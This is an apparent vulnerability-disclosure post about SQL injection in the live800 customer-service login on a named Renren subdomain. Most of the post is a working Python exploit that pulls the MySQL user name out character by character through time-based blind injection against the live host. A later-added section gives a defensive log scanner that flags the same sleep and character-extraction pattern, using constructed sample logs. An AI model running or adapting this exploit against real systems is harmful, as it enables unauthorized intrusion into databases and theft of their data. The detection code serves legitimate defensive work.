Renren website has SQL injection vulnerability with verification script
Renren website SQL Injection Vulnerability
Recently, live800 seems to be very popular, and I searched WooYun for it...
http://live800.wan.renren.com/live800/loginAction.jsp?companyLoginName=1*&loginName=a111&password=111
This is the live800 customer service system, which has already been cracked by the experts.
I found a script by lijiejie. At the beginning, I could not get past an incomplete format exception.
After the script was completed, I felt very lucky. Haha, please visit the homepage.
import httplib
import time
import string
import sys
import random
import urllib

headers = {}
# Candidate characters for the database user name
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):
    for payload in payloads:
        try:
            # Condition on character i of user(); a true condition delays the response by 3 seconds
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "1'XOR(if(%s,sleep(3),0))OR'1" % s
            conn = httplib.HTTPConnection('live800.wan.renren.com', timeout=3)
            conn.request(method='GET', url="/live800/loginAction.jsp?companyLoginName=1%s&loginName=a111&password=111" % urllib.quote(s))
            conn.getresponse()
            conn.close()
            print '.',
        except Exception, e:
            # The 3-second client timeout fired, so the condition was true for this character
            print e
            user += payload
            print '\n[in progress]', user,
            time.sleep(3.0)
            break
print '\n[Done] MySQL user is %s' % user
Solution:
Upgrade
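A defender's view of the script above, as an added example that is not part of the original post: a Python 3 scan of web access logs for the delay-plus-character-extraction pattern that the script sends to loginAction.jsp. The simplified log format, the sample lines, the client addresses and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import quote, urlsplit, parse_qsl

LOGIN_PATH = "/live800/loginAction.jsp"
# Markers of the time-based blind pattern used by the script above.
DELAY = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
EXTRACT = re.compile(r"\b(ascii|ord)\s*\(\s*(mid|substr|substring)\s*\(", re.I)
REQUEST = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+"$')

def classify(url):
    """Return the set of reasons a login request looks like blind SQL injection."""
    parts = urlsplit(url)
    reasons = set()
    if parts.path != LOGIN_PATH:
        return reasons
    # parse_qsl percent-decodes each value, so encoded payloads are matched too.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if DELAY.search(value):
            reasons.add("delay-function")
        if EXTRACT.search(value):
            reasons.add("char-extraction")
        if "'" in value:
            reasons.add("quote-in-field")
    return reasons

def suspicious_clients(lines, threshold=3):
    """Count requests carrying both markers per client; report clients at or above threshold."""
    hits = Counter()
    for line in lines:
        m = REQUEST.match(line)
        if m and {"delay-function", "char-extraction"} <= classify(m.group(2)):
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

def _line(ip, company):
    # Constructed access-log line in a simplified format (an assumption).
    return '%s "GET %s?companyLoginName=%s&loginName=a111&password=111 HTTP/1.1"' % (
        ip, LOGIN_PATH, quote(company))

# Constructed sample log: two ordinary logins and four probes shaped like the script's requests.
PROBE = "11'XOR(if(ascii(mid(lower(user()),%d,1))=%d,sleep(3),0))OR'1"
SAMPLE_LOG = [_line("203.0.113.7", "acme"), _line("203.0.113.8", "o'brien")]
SAMPLE_LOG += [_line("198.51.100.9", PROBE % (1, c)) for c in (97, 98, 99, 100)]

if __name__ == "__main__":
    print(suspicious_clients(SAMPLE_LOG))
```

A lone quote in a login field, as in the second sample line, is recorded as a reason but does not count toward the per-client total, which keeps ordinary names with apostrophes from raising alerts.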